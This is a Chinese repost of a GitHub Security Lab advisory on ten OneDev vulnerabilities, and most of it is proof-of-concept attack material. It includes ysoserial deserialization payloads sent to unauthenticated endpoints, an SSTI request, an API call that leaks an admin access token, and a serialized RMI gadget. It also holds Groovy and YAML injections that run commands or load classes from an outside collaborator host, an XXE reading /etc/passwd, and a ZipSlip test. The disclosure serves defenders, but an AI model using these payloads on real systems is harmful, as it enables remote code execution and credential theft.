跳转至

OneDev 多个高危漏洞 (CVE-2021-21242~51)

CVE-2021-21242

CVE-2021-21243

CVE-2021-21244

CVE-2021-21245

CVE-2021-21246

CVE-2021-21247

CVE-2021-21248

CVE-2021-21249

CVE-2021-21250

CVE-2021-21251

1.AttachmentUploadServet上的预授权不安全反序列化

PoC:

用于ysoserial使用URLDNS小工具生成探测有效负载。该小工具将发送一个DNS请求,我们可以对其进行拦截以证明反序列化攻击已成功。

curl -X POST http://localhost:6610/attachment_upload -H "File-Name: foo" -H "Attachment-Support: `java -jar /Users/pwntester/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://536mvpzmverok48wr06msp5du40uoj.burpcollaborator.net | base64`"

2.在KubernetesResource上进行预认证不安全反序列化

PoC:

java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin`
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/allocate-job-caches

java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/report-job-caches

3.通过Bean验证消息篡改进行预身份验证SSTI

PoC:

${'test'.toUpperCase()}` -> `%24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d

curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/projects\?%24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d=bar

Caused by: org.glassfish.jersey.server.ContainerException: java.lang.NoSuchMethodError: javax.el.ELContext.notifyBeforeEvaluation(Ljava/lang/String;)

curl -X GET -H "Content-Type: application/json"  https://code.onedev.io/rest/projects\?%24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d=bar
Unexpected query params: [TEST] (path = ProjectResource.query.<cross-parameter>, invalidValue = [null, null, null, org.glassfish.jersey.server.internal.routing.UriRoutingContext@5b27a361])

4:验证前任意文件上传

String fileName = URLDecoder.decode(request.getHeader("File-Name"), StandardCharsets.UTF_8.name());
...
String attachmentName = attachmentSuppport.saveAttachment(fileName, request.getInputStream());

5:验证前访问令牌泄漏

PoC:

curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/users
Unauthorized access to user profiles

curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/users/1
{
  "id" : 1,
  "name" : "admin",
  "fullName" : "admin",
  "ssoInfo" : {
    "connector" : null,
    "subject" : "4a155bff-715d-45e9-8898-4152bb97d25e"
  },
  "email" : "alvaro@pwntester.com",
  "accessToken" : "JqnqWs6YsP8x3poNpnj6J6GFbvh0szli6lr5BWH8",
  "userProjectQueries" : [ ],
  "userIssueQueries" : [ ],
  "userIssueQueryWatches" : { },
  "issueQueryWatches" : { },
  "userPullRequestQueries" : [ ],
  "userPullRequestQueryWatches" : { },
  "pullRequestQueryWatches" : { },
  "userBuildQueries" : [ ],
  "userBuildQuerySubscriptions" : [ ],
  "buildQuerySubscriptions" : [ ]
}

6:BasePage(AJAX)上的验证后不安全反序列化

PoC:

POST /projects/my-app/blob?7-1.IBehaviorListener.0- HTTP/1.1
Host: localhost:6610
Content-Length: 389
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax-BaseURL: projects/my-app/blob
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:6610
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:6610/projects/my-app/blob
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=node0cq7tdfxnza2v1nb58f7zwg7jj6.node0
Connection: close

data=rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3OAAKVW5pY2FzdFJlZgAPdG91Y2ggL3RtcC9mb29vAACFE//////C/CKmAAAAAAAAAAAAAAAAAAAAeA==

需身份验证。

7:通过Groovy脚本注入执行验证后任意代码

PoC:

foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} //

8:验证后不安全Yaml反序列化

version: 1
jobs:
- name: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://qgayzevwou8by0k3ochje4ebx23srh.burpcollaborator.net"]]]]
  image: asdasd
  commands:
  - asd
  retrieveSource: true
  cloneCredential: !DefaultCredential {}
  cpuRequirement: 250m
  memoryRequirement: 128m
  retryCondition: never
  maxRetries: 3
  retryDelay: 30
  timeout: 3600

9:验证后外部实体扩展(XXE)

PoC:

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>

10:ZipSlip任意文件上传

import io.onedev.commons.utils.TarUtils;
import java.io.FileInputStream;
import java.io.File;

public class UnTarTest {
  public static void main(String[] args) {
    try {
      FileInputStream is = new FileInputStream(new File("./zip-slip.tar"));
      TarUtils.untar(is, new File("./dest"));
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}

from:https://securitylab.github.com/advisories/GHSL-2020-214_223-onedev